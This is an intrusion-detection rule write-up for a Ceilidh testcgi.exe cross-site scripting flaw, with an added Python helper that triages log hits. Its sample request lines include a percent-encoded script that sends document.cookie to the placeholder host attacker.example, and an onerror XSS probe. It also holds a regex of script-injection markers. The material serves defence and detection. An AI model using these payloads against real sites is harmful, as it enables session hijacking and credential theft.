GEN:SID | 1:1645 |
Message | WEB-CGI testcgi access |
Summary | This event is generated when an attempt is made to access /testcgi on a web server. This may indicate an attempt to exploit a cross-site scripting vulnerability that affects Ceilidh.
|
Impact | Execution of attacker-supplied script in the victim's browser in the context of the Ceilidh site, possible session hijack.
|
Detailed Information | This event indicates that an attempt has been made to exploit a cross-site scripting vulnerability in Ceilidh, web-based discussion software released by Lilikoi Software, Inc. An attacker can craft a URL that passes script content to testcgi.exe, which echoes it back to the browser without sanitizing it. If a legitimate user follows the URL, the attacker's script runs in that user's browser in the security context of the Ceilidh site. Note that the rule fires on any request whose URI contains /testcgi, so a single event may also be a scanner probe or legitimate use rather than an exploit attempt; the request URI should be inspected for script content before the event is treated as an attack.
|
Affected Systems | All web servers running Ceilidh 2.6 or 2.7 are vulnerable. All clients that access Ceilidh 2.6 or 2.7 are vulnerable.
|
Attack Scenarios | An attacker may craft a script that reads the user's session cookie and sends it to a host the attacker controls, thereby allowing the attacker to pose as the user for the duration of the session.
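The following triage helper is an added example, not part of the original rule documentation, of the Snort rule, or of Ceilidh. It reimplements the event's match condition described above (a request URI containing /testcgi, case-insensitive, after percent-decoding) over a handful of constructed HTTP request lines, then separates plain probes from hits whose query string carries script-like content such as the cookie-stealing scenario. The request lines, the host attacker.example, and the script-marker heuristic are all assumptions made for the example.

```python
"""Triage helper for hits on "WEB-CGI testcgi access" (SID 1:1645).

Added example: not the Snort rule text and not Ceilidh code. It mirrors the
event's match (URI contains "/testcgi", case-insensitive) over constructed
request lines and flags those whose query string looks like an XSS payload.
"""
import re
from urllib.parse import unquote, unquote_plus, urlsplit

# Constructed sample request lines, as they might appear in an access log.
# These are not real traffic.
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.1",
    "GET /cgi-bin/testcgi.exe HTTP/1.0",
    # Cookie-theft payload, percent-encoded; attacker.example is a placeholder.
    "GET /ceilidh/testcgi.exe?%3Cscript%3Edocument.location%3D%27http%3A%2F%2F"
    "attacker.example%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1",
    "GET /TESTCGI.EXE?name=alice HTTP/1.1",
    # Percent-encoded letter in the path plus an event-handler payload.
    "GET /cgi-bin/%74estcgi.exe?x=%3Cimg+src%3Dx+onerror%3Dalert(1)%3E HTTP/1.1",
    "POST /login HTTP/1.1",
]

# The event's match condition: "/testcgi" anywhere in the normalized URI.
URI_PATTERN = re.compile(r"/testcgi", re.IGNORECASE)

# Heuristic markers of script injection (assumption for triage, not a rule).
SCRIPT_MARKERS = re.compile(
    r"<\s*script|javascript:|\bon\w+\s*=|<\s*(?:img|iframe|svg|body)\b|document\.cookie",
    re.IGNORECASE,
)


def percent_decode(text, decoder, rounds=2):
    """Decode up to `rounds` times so double-encoded payloads also surface."""
    for _ in range(rounds):
        decoded = decoder(text)
        if decoded == text:
            break
        text = decoded
    return text


def classify_request(request_line):
    """Return None if the event would not fire, else "probe" or "xss_payload"."""
    parts = request_line.split()
    if len(parts) < 2:
        return None
    raw = urlsplit(parts[1])
    path = percent_decode(raw.path, unquote)          # no '+' handling in paths
    query = percent_decode(raw.query, unquote_plus)   # '+' means space in queries
    normalized = path + ("?" + query if query else "")
    if not URI_PATTERN.search(normalized):
        return None
    return "xss_payload" if SCRIPT_MARKERS.search(query) else "probe"


def triage(request_lines):
    """Return (request_line, classification) for every line the event matches."""
    results = []
    for line in request_lines:
        verdict = classify_request(line)
        if verdict is not None:
            results.append((line, verdict))
    return results


if __name__ == "__main__":
    for line, verdict in triage(SAMPLE_REQUESTS):
        print(f"{verdict:12s} {line}")
```

Hits classified as "probe" still deserve a look at the source address and the surrounding requests, since a scanner that finds testcgi.exe present will usually return with a payload; the split only orders the work.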
|
Ease of Attack | Simple. A proof of concept exists.
|
Corrective Action | Upgrade to the latest version of the software. If testcgi.exe is not required, remove it from the web server so that it cannot be reached at all.
|
Additional References | Bugtraq http://www.securityfocus.com/bid/7214
Nessus http://cgi.nessus.org/plugins/dump.php3?id=11610
|
Rule References | bugtraq: 7214
nessus: 11610
|